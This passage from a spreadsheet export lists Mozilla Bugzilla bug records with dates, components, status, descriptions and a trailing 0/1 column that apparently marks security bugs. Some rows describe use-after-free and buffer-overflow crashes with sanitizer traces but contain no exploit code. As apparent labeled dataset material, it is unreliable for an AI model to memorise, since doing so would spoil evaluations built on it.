    #33 0x7ff573299399 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:95
    #34 0x7ff573226a0c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #35 0x7ff573226a0c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #36 0x7ff573226a0c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #37 0x7ff577e045f7 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:165
    #38 0x7ff579bdf662 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:745
    #39 0x7ff573226a0c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #40 0x7ff573226a0c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #41 0x7ff573226a0c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #42 0x7ff579bded5b in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:581
    #43 0x48d292 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:236
    #44 0x7ff5704b1ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:930 CanonicalizeXPCOMParticipant
Shadow bytes around the buggy address:
  0x0c2280045620: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c2280045630: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280045640: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c2280045650: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280045660: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c2280045670: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd
  0x0c2280045680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280045690: fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa
  0x0c22800456a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800456b0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c22800456c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzon==8659==ABORTING
###!!! [Parent][MessageChannel] Error: (msgtype=0x200079,name=PBrowser::Msg_Destroy) Channel error: cannot send/recv
[Parent 8482] WARNING: pipe error (49): Connection reset by peer: file /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 459
The stack above shows that it's dedicated worker instead of shared worker:
    #10 0x7ff575e55586 in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./WorkerBinding.cpp:747
The line number indicates that the fix for Bug 1166924   was already in it:
    #3 0x7ff5779aab85 in mozilla::dom::workers::XMLHttpRequest::Constructor(mozilla::dom::GlobalObject const&amp;, mozilla::dom::MozXMLHttpRequestParameters const&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/XMLHttpRequest.cpp:1655</t>
        </is>
      </c>
      <c r="X4056" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4057">
      <c r="A4057" t="n">
        <v>775206</v>
      </c>
      <c r="B4057" t="inlineStr">
        <is>
          <t>2012-07-18 11:48:33 -0700</t>
        </is>
      </c>
      <c r="C4057" t="inlineStr">
        <is>
          <t>Random IndexedDB crashes with Trial Tool</t>
        </is>
      </c>
      <c r="D4057" t="inlineStr">
        <is>
          <t>2012-10-21 22:15:05 -0700</t>
        </is>
      </c>
      <c r="E4057" t="n">
        <v>1</v>
      </c>
      <c r="F4057" t="n">
        <v>1</v>
      </c>
      <c r="G4057" t="n">
        <v>3</v>
      </c>
      <c r="H4057" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4057" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4057" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K4057" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4057" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4057" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4057" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4057" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4057" t="inlineStr">
        <is>
          <t>[qa?][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q4057" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4057" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4057" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T4057" t="n">
        <v>1</v>
      </c>
      <c r="U4057" t="n">
        <v>0</v>
      </c>
      <c r="V4057" t="n">
        <v>21</v>
      </c>
      <c r="W4057" t="inlineStr">
        <is>
          <t>If I open up the "Trial Tool" at http://nparashuram.com/trialtool/index.html#example=/IndexedDB/trialtool/moz_indexedDB.html&amp;selected=#db&amp;
and then do a bunch of running of various testcases in somewhat random orders (I only used prereqs, open, open+1, delete, close, create obj store, delete obj store, list obj store -- didn't touch anything below that), I can often get a crash when I reload the page.  I've reproduced it twice with the following two different crash reports
https://crash-stats.mozilla.com/report/index/bp-f489fa2b-96a0-4031-b91a-5966a2120718
https://crash-stats.mozilla.com/report/index/bp-4439b6f2-778c-4153-80af-324ee2120718
Had a harder time doing it a third time. 2012-07-18 m-c nightly.</t>
        </is>
      </c>
      <c r="X4057" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4058">
      <c r="A4058" t="n">
        <v>468186</v>
      </c>
      <c r="B4058" t="inlineStr">
        <is>
          <t>2008-12-05 16:03:39 -0800</t>
        </is>
      </c>
      <c r="C4058" t="inlineStr">
        <is>
          <t>Sign Funnelcake builds (12/15/08 ship date)</t>
        </is>
      </c>
      <c r="D4058" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4058" t="n">
        <v>1</v>
      </c>
      <c r="F4058" t="n">
        <v>1</v>
      </c>
      <c r="G4058" t="n">
        <v>5</v>
      </c>
      <c r="H4058" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4058" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4058" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4058" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4058" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4058" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4058" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4058" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4058" t="inlineStr"/>
      <c r="Q4058" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4058" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4058" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4058" t="n">
        <v>1</v>
      </c>
      <c r="U4058" t="n">
        <v>0</v>
      </c>
      <c r="V4058" t="n">
        <v>7</v>
      </c>
      <c r="W4058" t="inlineStr">
        <is>
          <t>Please sign funnelcake builds.  Once Kev repacks, the builds should be made ready for signing at people.mozilla.org:/tmp/funnelcake4-304-signed.tar.
Once signed, builds can be available at https://people.mozilla.org/files/partners/mozilla04/3.0.4/.</t>
        </is>
      </c>
      <c r="X4058" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4059">
      <c r="A4059" t="n">
        <v>864581</v>
      </c>
      <c r="B4059" t="inlineStr">
        <is>
          <t>2013-04-22 17:20:23 -0700</t>
        </is>
      </c>
      <c r="C4059" t="inlineStr">
        <is>
          <t>Add stats API</t>
        </is>
      </c>
      <c r="D4059" t="inlineStr">
        <is>
          <t>2013-04-23 14:18:55 -0700</t>
        </is>
      </c>
      <c r="E4059" t="n">
        <v>1</v>
      </c>
      <c r="F4059" t="n">
        <v>1</v>
      </c>
      <c r="G4059" t="n">
        <v>6</v>
      </c>
      <c r="H4059" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4059" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J4059" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K4059" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L4059" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4059" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4059" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4059" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4059" t="inlineStr">
        <is>
          <t>p=2</t>
        </is>
      </c>
      <c r="Q4059" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4059" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4059" t="inlineStr">
        <is>
          <t>2013-04-25</t>
        </is>
      </c>
      <c r="T4059" t="n">
        <v>1</v>
      </c>
      <c r="U4059" t="n">
        <v>0</v>
      </c>
      <c r="V4059" t="n">
        <v>3</v>
      </c>
      <c r="W4059" t="inlineStr">
        <is>
          <t>The code in mkt/stats is twisty and complicated and very difficult to work in. We also don't know what is used or isn't used.
Now that we have monolith mkt/stats should simply be a view that loads templates to set up the javascript for charts which calls the stats API to get data.
Moving away from highcharts also allows us to craft the API to accept its args more simply and return the data in a simpler form.
WIP patch here before I realized I was working bugless:
https://github.com/robhudson/zamboni/commit/0d4da2a
New charts can use this new API. Old charts can migrate to it over time.</t>
        </is>
      </c>
      <c r="X4059" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4060">
      <c r="A4060" t="n">
        <v>1840144</v>
      </c>
      <c r="B4060" t="inlineStr">
        <is>
          <t>2023-06-23 11:25:42 -0700</t>
        </is>
      </c>
      <c r="C4060" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free on PR_GetIdentitiesLayer after SSL_SetURL PORT_Strdup(url) allocation failure</t>
        </is>
      </c>
      <c r="D4060" t="inlineStr">
        <is>
          <t>2024-05-30 11:11:28 -0700</t>
        </is>
      </c>
      <c r="E4060" t="n">
        <v>1</v>
      </c>
      <c r="F4060" t="n">
        <v>1</v>
      </c>
      <c r="G4060" t="n">
        <v>3</v>
      </c>
      <c r="H4060" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4060" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4060" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K4060" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4060" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4060" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4060" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4060" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4060" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][psm-assigned][adv-main121+][adv-esr115.6+]</t>
        </is>
      </c>
      <c r="Q4060" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4060" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4060" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T4060" t="n">
        <v>1</v>
      </c>
      <c r="U4060" t="n">
        <v>0</v>
      </c>
      <c r="V4060" t="n">
        <v>21</v>
      </c>
      <c r="W4060" t="inlineStr">
        <is>
          <t>Created attachment 9340751
ssl-seturl-failure-heap-use-after-free-4.txt
When launching Firefox with `--disable-e10s` and fillMemory code, then when contacting with URL, at rare time Firefox able to crash with `AddressSanitizer: heap-use-after-free` on `PR_GetIdentitiesLayer`. 
It happen when allocation failure on `SSL_SetURL` malloc at [`ss-&gt;url = (const char *)PORT_Strdup(url);`](https://searchfox.org/mozilla-central/source/security/nss/lib/ssl/sslsecur.c#1157)</t>
        </is>
      </c>
      <c r="X4060" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4061">
      <c r="A4061" t="n">
        <v>1294438</v>
      </c>
      <c r="B4061" t="inlineStr">
        <is>
          <t>2016-08-11 07:35:38 -0700</t>
        </is>
      </c>
      <c r="C4061" t="inlineStr">
        <is>
          <t>Private browsing browser traces (android) in browser.db and wal file</t>
        </is>
      </c>
      <c r="D4061" t="inlineStr">
        <is>
          <t>2024-05-30 09:20:20 -0700</t>
        </is>
      </c>
      <c r="E4061" t="n">
        <v>1</v>
      </c>
      <c r="F4061" t="n">
        <v>1</v>
      </c>
      <c r="G4061" t="n">
        <v>6</v>
      </c>
      <c r="H4061" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4061" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4061" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4061" t="inlineStr">
        <is>
          <t>48 Branch</t>
        </is>
      </c>
      <c r="L4061" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4061" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4061" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4061" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4061" t="inlineStr">
        <is>
          <t>[MobileAS][adv-main50+]</t>
        </is>
      </c>
      <c r="Q4061" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4061" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4061" t="inlineStr">
        <is>
          <t>Firefox 51</t>
        </is>
      </c>
      <c r="T4061" t="n">
        <v>1</v>
      </c>
      <c r="U4061" t="n">
        <v>0</v>
      </c>
      <c r="V4061" t="n">
        <v>22</v>
      </c>
      <c r="W4061" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Firefox for Android
Steps to reproduce:
I visited some sites (9gag.com, google.com, etc.) in inkognito mode on my Firefox client on Android (Ver. 48.0), 'grep'ed those domains from all files in "/data/data/org.mozilla.firefox/files/mozilla/****.default/" and got binary mathes in the files "browser.db" and "browser.db-wal". Although this requires root, still incognito mode should provide some protection, at least it shouldn't leave traces in persistant files.
Actual results:
root@A0001:/data/data/org.mozilla.firefox/files/mozilla/baro4nyl.default #
grep 9gag*
Binary file browser.db-wal matches
root@A0001:/data/data/org.mozilla.firefox/files/mozilla/baro4nyl.default #
Expected results:
root@A0001:/data/data/org.mozilla.firefox/files/mozilla/baro4nyl.default #
grep 9gag*
root@A0001:/data/data/org.mozilla.firefox/files/mozilla/baro4nyl.default #</t>
        </is>
      </c>
      <c r="X4061" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4062">
      <c r="A4062" t="n">
        <v>1521961</v>
      </c>
      <c r="B4062" t="inlineStr">
        <is>
          <t>2019-01-22 14:29:10 -0800</t>
        </is>
      </c>
      <c r="C4062" t="inlineStr">
        <is>
          <t>Pref Search in PBM OFF by default in 66 Release</t>
        </is>
      </c>
      <c r="D4062" t="inlineStr">
        <is>
          <t>2022-12-15 05:45:32 -0800</t>
        </is>
      </c>
      <c r="E4062" t="n">
        <v>1</v>
      </c>
      <c r="F4062" t="n">
        <v>1</v>
      </c>
      <c r="G4062" t="n">
        <v>2</v>
      </c>
      <c r="H4062" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4062" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4062" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K4062" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4062" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4062" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4062" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4062" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4062" t="inlineStr"/>
      <c r="Q4062" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4062" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4062" t="inlineStr">
        <is>
          <t>Firefox 66</t>
        </is>
      </c>
      <c r="T4062" t="n">
        <v>1</v>
      </c>
      <c r="U4062" t="n">
        <v>0</v>
      </c>
      <c r="V4062" t="n">
        <v>5</v>
      </c>
      <c r="W4062" t="inlineStr">
        <is>
          <t>We are going to run a study to ensure search volume gains before prefing this feature on by default.  Let's leave it prefed on by default in 66 beta and make sure it's preffed off in the release channel</t>
        </is>
      </c>
      <c r="X4062" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4063">
      <c r="A4063" t="n">
        <v>727751</v>
      </c>
      <c r="B4063" t="inlineStr">
        <is>
          <t>2012-02-16 02:08:43 -0800</t>
        </is>
      </c>
      <c r="C4063" t="inlineStr">
        <is>
          <t>xulrunner source failure on 1.9.2</t>
        </is>
      </c>
      <c r="D4063" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4063" t="n">
        <v>1</v>
      </c>
      <c r="F4063" t="n">
        <v>1</v>
      </c>
      <c r="G4063" t="n">
        <v>5</v>
      </c>
      <c r="H4063" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4063" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4063" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4063" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4063" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4063" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4063" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4063" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4063" t="inlineStr">
        <is>
          <t>[release][automation]</t>
        </is>
      </c>
      <c r="Q4063" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4063" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4063" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4063" t="n">
        <v>1</v>
      </c>
      <c r="U4063" t="n">
        <v>0</v>
      </c>
      <c r="V4063" t="n">
        <v>5</v>
      </c>
      <c r="W4063" t="inlineStr">
        <is>
          <t>mv mozilla-1.9.2/obj-firefox/dist/source/xulrunner-3.6.27.source.tar.bz2 source/xulrunner-3.6.27.source.tar.bz2
 in dir /builds/slave/rel-m-192-xr-source/. (timeout 1200 secs)
mv: cannot stat `mozilla-1.9.2/obj-firefox/dist/source/xulrunner-3.6.27.source.tar.bz2': No such file or directory
program finished with exit code 1
3.6.26 did the equivalent:
mv mozilla-1.9.2/obj-firefox/dist/source/xulrunner-3.6.26.source.tar.bz2 source/xulrunner-3.6.26.source.tar.bz2
but had 'MOZ_PKG_VERSION=3.6.26' in both previous step where the tarball is created.
Looks like fallout from bug 554324.</t>
        </is>
      </c>
      <c r="X4063" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4064">
      <c r="A4064" t="n">
        <v>1506144</v>
      </c>
      <c r="B4064" t="inlineStr">
        <is>
          <t>2018-11-09 07:00:19 -0800</t>
        </is>
      </c>
      <c r="C4064" t="inlineStr">
        <is>
          <t>Access bugzilla security bug metadata via STMO</t>
        </is>
      </c>
      <c r="D4064" t="inlineStr">
        <is>
          <t>2020-02-18 13:45:20 -0800</t>
        </is>
      </c>
      <c r="E4064" t="n">
        <v>1</v>
      </c>
      <c r="F4064" t="n">
        <v>1</v>
      </c>
      <c r="G4064" t="n">
        <v>7</v>
      </c>
      <c r="H4064" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4064" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4064" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4064" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L4064" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4064" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4064" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4064" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4064" t="inlineStr"/>
      <c r="Q4064" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4064" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4064" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4064" t="n">
        <v>1</v>
      </c>
      <c r="U4064" t="n">
        <v>0</v>
      </c>
      <c r="V4064" t="n">
        <v>18</v>
      </c>
      <c r="W4064" t="inlineStr">
        <is>
          <t>We (the Firefox security teams) would like to be able to access security bug metadata via STMO so that we can create live dashboards similar to the static info Dan is now emailing.
The plan is to use the Secops metrics pipeline - that already gathers a growing set of security metrics from a variety of sources and makes them accessible via STMO.
The current pipleline is:
* Scripts run in the Ops Jenkins server and collect raw metrics
* They write the raw data into folders under s3://foxsec-metrics 
* Post processing is applied if we need to reformat it (for Athena)
* Athena tables are applied to the relevant folders and added to the foxsec_metrics db
* The foxsec_metrics db is a data source in STMO
The foxsec_metrics data source in STMO is currently restricted to the Secops team, but the plan is to expand that to all of the Firefox security teams.
We also plan to make some STMO visualisations on this data accessible to everyone in Mozilla.
We would like a subset of the available bugzilla fields so that we don't inadvertently expose details of unfixed security bugs.
The bugs that we are interested in and the fields we would like are currently being collated in this gdoc: https://docs.google.com/document/d/1v5HZlH77PHcPSup0gDJTKUKzuCBE3ltGVwgz0d_DeU0/edit#
Note that right now this is work in progress - I'll update this bug with that info once we have finalized it.
We will need to be able to combine bugzilla data with data from the foxsec_metrics db. I'm not sure if we can combine multiple data sources in STMO.</t>
        </is>
      </c>
      <c r="X4064" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4065">
      <c r="A4065" t="n">
        <v>29329</v>
      </c>
      <c r="B4065" t="inlineStr">
        <is>
          <t>2000-02-25 17:07:27 -0800</t>
        </is>
      </c>
      <c r="C4065" t="inlineStr">
        <is>
          <t>DOM Range crash - set(Start|End)(Before|After) given node with null parent</t>
        </is>
      </c>
      <c r="D4065" t="inlineStr">
        <is>
          <t>2013-04-04 13:53:36 -0700</t>
        </is>
      </c>
      <c r="E4065" t="n">
        <v>1</v>
      </c>
      <c r="F4065" t="n">
        <v>1</v>
      </c>
      <c r="G4065" t="n">
        <v>3</v>
      </c>
      <c r="H4065" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4065" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4065" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4065" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4065" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4065" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4065" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4065" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4065" t="inlineStr">
        <is>
          <t>[nsbeta2+] (fix in hand)</t>
        </is>
      </c>
      <c r="Q4065" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4065" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4065" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T4065" t="n">
        <v>1</v>
      </c>
      <c r="U4065" t="n">
        <v>0</v>
      </c>
      <c r="V4065" t="n">
        <v>16</v>
      </c>
      <c r="W4065" t="inlineStr">
        <is>
          <t>DESCRIPTION:  I crash in Range::SetStartBefore() if I give it a node whose
parentNode is null.  I think the fix to this bug may be to change these four
functions to get the parent before calling IndexOf(), and throw an exception if
the parent is null.  But you may want to have a null check in IndexOf() also.
STEPS TO REPRODUCE:
 * load attached test case
ACTUAL RESULTS:
 * crash in nsRange::IndexOf(), when dereferencing the pointer to the parent
node.
EXPECTED RESULTS:
 * no crash
DOES NOT WORK CORRECTLY ON:
 * Linux, mozilla, 2000-02-24-15-M14
ADDITIONAL INFORMATION:
I posted a message to www-dom about which exception should be thrown (and
whether it should be thrown):
http://lists.w3.org/Archives/Public/www-dom/2000JanMar/0107.html</t>
        </is>
      </c>
      <c r="X4065" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4066">
      <c r="A4066" t="n">
        <v>18352</v>
      </c>
      <c r="B4066" t="inlineStr">
        <is>
          <t>1999-11-09 12:44:20 -0800</t>
        </is>
      </c>
      <c r="C4066" t="inlineStr">
        <is>
          <t>[META] build should not require extensions/</t>
        </is>
      </c>
      <c r="D4066" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E4066" t="n">
        <v>1</v>
      </c>
      <c r="F4066" t="n">
        <v>1</v>
      </c>
      <c r="G4066" t="n">
        <v>2</v>
      </c>
      <c r="H4066" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4066" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4066" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K4066" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4066" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4066" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4066" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4066" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4066" t="inlineStr"/>
      <c r="Q4066" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4066" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4066" t="inlineStr">
        <is>
          <t>mozilla0.9.9</t>
        </is>
      </c>
      <c r="T4066" t="n">
        <v>1</v>
      </c>
      <c r="U4066" t="n">
        <v>0</v>
      </c>
      <c r="V4066" t="n">
        <v>81</v>
      </c>
      <c r="W4066" t="inlineStr">
        <is>
          <t>The point of the extensions/ directory was to put optional things there.  If you
attempt to build the browser with that directory missing, it will crash.  If
nsIWalletService.h &amp; nsICookieService.h are moved into another directory (say
mozilla/include/), the browser builds fine without the extensions directory.
So, the question is...where do we move these header files?  They are needed to
provide the interface to Mozilla but the directories that they are currently in
are not needed.</t>
        </is>
      </c>
      <c r="X4066" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4067">
      <c r="A4067" t="n">
        <v>888361</v>
      </c>
      <c r="B4067" t="inlineStr">
        <is>
          <t>2013-06-28 10:22:12 -0700</t>
        </is>
      </c>
      <c r="C4067" t="inlineStr">
        <is>
          <t>Buffer overflow in WriteStatusFailure in maintenanceservice.exe</t>
        </is>
      </c>
      <c r="D4067" t="inlineStr">
        <is>
          <t>2024-05-30 08:04:54 -0700</t>
        </is>
      </c>
      <c r="E4067" t="n">
        <v>1</v>
      </c>
      <c r="F4067" t="n">
        <v>1</v>
      </c>
      <c r="G4067" t="n">
        <v>3</v>
      </c>
      <c r="H4067" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
